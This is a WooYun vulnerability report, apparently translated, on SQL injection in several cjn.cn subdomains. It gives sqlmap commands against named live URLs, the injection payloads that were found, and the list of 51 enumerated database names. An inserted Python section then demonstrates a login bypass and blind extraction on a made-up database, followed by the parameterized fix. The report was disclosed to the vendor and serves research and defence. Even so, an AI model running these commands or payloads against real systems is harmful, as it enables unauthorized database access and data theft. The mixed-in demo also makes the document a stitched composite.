2015-12-21: Details have been sent to the vendor and are awaiting the vendor's handling
2015-12-21: The vendor has confirmed; details are disclosed to the vendor only
2015-12-31: Details disclosed to core white hats and experts in the relevant field
2016-01-10: Details disclosed to regular white hats
2016-01-20: Details disclosed to intern white hats
2016-02-01: Details disclosed to the public
Since you went and registered on WooYun, could you stop ignoring vulnerabilities all the time?
Injection point 1:
http://mindiao.cjn.cn/guest_more.php?boardid=81
sqlmap.py -u "http://mindiao.cjn.cn/guest_more.php?boardid=81" --dbs
[22:08:21] [INFO] GET parameter 'boardid' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'boardid' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 72 HTTP(s) requests:
---
Parameter: boardid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: boardid=81 AND 3729=3729

    Type: UNION query
    Title: Generic UNION query (NULL) - 19 columns
    Payload: boardid=81 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7178706b71,0x6a457477756c575161796e5077736f446474776a48484b776657526f4457514543724e63714f6848,0x71626b7071),NULL,NULL,NULL,NULL-- -
---
[22:08:32] [INFO] testing MySQL
[22:08:35] [INFO] confirming MySQL
[22:08:37] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.2.27, PHP 5.2.17
back-end DBMS: MySQL >= 5.0.0
[22:08:37] [INFO] fetching database names
available databases [51]:
[*] #mysql50#cjntj.bak
[*] #mysql50#cjnvote.bak
[*] #mysql50#phpwind.bak
[*] cc
[*] ccvms
[*] cjnphoto
[*] cjnvote
[*] collabtive
[*] dwz
[*] information_schema
[*] maps
[*] mingpai
[*] mysql
[*] myt
[*] newdata_user
[*] osfc
[*] phpstat_mysql_10_mysql
[*] phpstat_mysql_10_mysql_log
[*] phpstat_mysql_1_mysql
[*] phpstat_mysql_1_mysql_log
[*] phpstat_mysql_2_mysql
[*] phpstat_mysql_2_mysql_log
[*] phpstat_mysql_3_mysql
[*] phpstat_mysql_3_mysql_log
[*] phpstat_mysql_4_mysql
[*] phpstat_mysql_4_mysql_log
[*] phpstat_mysql_5_mysql
[*] phpstat_mysql_5_mysql_log
[*] phpstat_mysql_6_mysql
[*] phpstat_mysql_6_mysql_log
[*] phpstat_mysql_7_mysql
[*] phpstat_mysql_7_mysql_log
[*] phpstat_mysql_8_mysql
[*] phpstat_mysql_8_mysql_log
[*] phpstat_mysql_9_mysql
[*] phpstat_mysql_9_mysql_log
[*] phpstat_mysql_mysql
[*] phpstat_web
[*] phpwind
[*] phpwindcs
[*] test
[*] TriAquae
[*] tweibo
[*] veryvote
[*] vsftpduser
[*] wh4z
[*] whwx
[*] wordpress
[*] xweibo
[*] xweibo2x
[*] zhenhao
51 databases; that should be the whole site.

Injection point 2:
sqlmap.py -u "http://myt.cjn.cn/user/pf_login.php" --data "password=a&submit=%E7%AE%A1%E7%90%86%E7%99%BB%E5%BD%95&username=a" --dbs
It found two databases:
POST parameter 'username' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 737 HTTP(s) requests:
---
Parameter: username (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: password=88952634&submit=%E7%AE%A1%E7%90%86%E7%99%BB%E5%BD%95&username=-9824' OR 4782=4782#

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind (comment)
    Payload: password=88952634&submit=%E7%AE%A1%E7%90%86%E7%99%BB%E5%BD%95&username=88952634' OR SLEEP(5)#
---
[22:24:30] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.2.27, PHP 5.2.17
back-end DBMS: MySQL 5.0.12
[22:24:30] [INFO] fetching database names
[22:24:30] [INFO] fetching number of databases
[22:24:30] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[22:24:30] [INFO] retrieved: 2
[22:24:47] [INFO] retrieved: informa
Too slow...

Injection point 3:
sqlmap.py -u "http://t.cjn.cn/user/pf_login.php" --data "password=a&submit=%E7%AE%A1%E7%90%86%E7%99%BB%E5%BD%95&username=a" --dbs
A POST SQL injection vulnerability exists here.
It gives the same result as the second injection point, two databases, so I won't paste a screenshot.
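As an added illustration (not code from this report, and not cjn.cn's own code), the Python below models the login behind the pf_login.php findings: a query assembled by string concatenation, the "' OR 4782=4782#" style bypass sqlmap reported, the boolean-based blind extraction that made the second run so slow, and the parameterized query that closes the hole. It also decodes the 0x... hex markers in the UNION payload from injection point 1. Everything about the database is constructed: SQLite stands in for MySQL (so the comment is "-- " instead of "#", and sqlite_master plays the role of information_schema), and the users table with its admin/s3cret row is invented for the demo.

```python
import sqlite3


def make_db():
    """Constructed stand-in for the login backend: one admin row, not real cjn.cn data."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 's3cret')")
    return conn


def login_vulnerable(conn, username, password):
    """Builds the query by string concatenation, the pattern behind the pf_login.php finding."""
    sql = ("SELECT username FROM users WHERE username='%s' AND password='%s'"
           % (username, password))
    return conn.execute(sql).fetchone() is not None


def login_safe(conn, username, password):
    """Same check with a parameterized query; user input never reaches the SQL parser as code."""
    sql = "SELECT username FROM users WHERE username=? AND password=?"
    return conn.execute(sql, (username, password)).fetchone() is not None


def blind_extract(oracle, expr, max_len=64):
    """Recover the string value of SQL expression `expr` through a true/false oracle.

    `oracle(cond)` must return True when the SQL condition `cond` holds. The length and
    then every character are found by binary search, one request per comparison, which
    is why a boolean-based blind run needs hundreds of requests per database name.
    """
    requests = 0

    def ask(cond):
        nonlocal requests
        requests += 1
        return oracle(cond)

    lo, hi = 0, max_len
    while lo < hi:
        mid = (lo + hi) // 2
        if ask("length(%s) > %d" % (expr, mid)):
            lo = mid + 1
        else:
            hi = mid
    length = lo

    chars = []
    for pos in range(1, length + 1):
        lo, hi = 0, 127                       # ASCII code point range
        while lo < hi:
            mid = (lo + hi) // 2
            if ask("unicode(substr(%s, %d, 1)) > %d" % (expr, pos, mid)):
                lo = mid + 1
            else:
                hi = mid
        chars.append(chr(lo))
    return "".join(chars), requests


def decode_hex_literal(literal):
    """Decode a MySQL 0x... string literal, e.g. the CONCAT() markers in the UNION payload."""
    return bytes.fromhex(literal[2:]).decode("ascii")


def demo():
    conn = make_db()
    # sqlmap's boolean-based payload, with SQLite's "-- " comment in place of MySQL's "#".
    bypass = "-9824' OR 4782=4782-- "
    vulnerable_bypassed = login_vulnerable(conn, bypass, "88952634")
    safe_bypassed = login_safe(conn, bypass, "88952634")

    # Oracle: inject a condition into the username field of the vulnerable login.
    def oracle(cond):
        return login_vulnerable(conn, "x' OR (%s)-- " % cond, "a")

    # sqlite_master plays the role of MySQL's information_schema in this constructed demo.
    first_table = "(SELECT name FROM sqlite_master WHERE type='table' LIMIT 1)"
    name, requests = blind_extract(oracle, first_table)
    return vulnerable_bypassed, safe_bypassed, name, requests


if __name__ == "__main__":
    vb, sb, name, n = demo()
    print("vulnerable login bypassed:", vb)
    print("parameterized login bypassed:", sb)
    print("extracted table name %r in %d requests" % (name, n))
    print("UNION markers:", decode_hex_literal("0x7178706b71"), decode_hex_literal("0x71626b7071"))
```

The five-character table name costs 41 oracle requests (6 for the length, 7 per character), which is the cost model behind sqlmap's 737 requests and its suggestion to use --threads; the time-based variant with SLEEP(5) is slower still, since every true answer waits five seconds. The parameterized login returns False for the same payload, because the quote and comment are data, not SQL.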
1. Take vulnerabilities seriously. Since you registered on WooYun, you can't keep ignoring them.
2. These are not the only vulnerabilities; please audit yourselves.
Severity: Medium
Vulnerability Rank: 5
Confirmed: 2015-12-21 10:22
Thanks for pointing out the vulnerability.
None